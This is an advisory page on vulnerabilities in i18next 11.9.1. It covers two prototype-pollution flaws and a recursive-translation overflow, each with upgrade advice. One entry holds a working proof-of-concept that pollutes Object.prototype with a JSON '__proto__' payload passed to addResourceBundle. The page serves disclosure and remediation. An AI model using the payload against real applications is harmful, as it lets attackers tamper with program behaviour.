i18next@11.9.1 vulnerabilities

i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

Affected versions of this package are vulnerable to Prototype Pollution via getLastOfPath() in i18next.js.

Upgrade i18next to version 19.8.5 or higher.

i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

Affected versions of this package are vulnerable to Prototype Pollution. This vulnerability relates to the AddResourceBundle API which uses the the deepExtend function (https://github.com/i18next/i18next/blob/master/i18next.js#L361-L370) internally to extend existing translations in a file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

PoC

import i18n from "i18next";
i18n.init({
    resources: {
      en: {
        namespace1: {
          key: 'hello from namespace 1'
        },
        namespace2: {
          key: 'hello from namespace 2'
        }
      },
      de: {
        namespace1: {
          key: 'hallo von namespace 1'
        },
        namespace2: {
          key: 'hallo von namespace 2'
        }  
      }
    }
  });

  var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
  i18n.init({ resources: {} });
  i18n.addResourceBundle('en', 'namespace1', JSON.parse(malicious_payload)
  ,true,true);
 
 
console.log(i18n.options.resources);
//a newly created empty object has the vulnerable property
console.log({}.vulnerable);

Upgrade i18next to version 19.8.3 or higher.

i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

Affected versions of this package are vulnerable to Buffer Overflow. It is possible to cause buffer overflow by changing the translation to be recursive.

Upgrade i18next to version 19.5.5 or higher.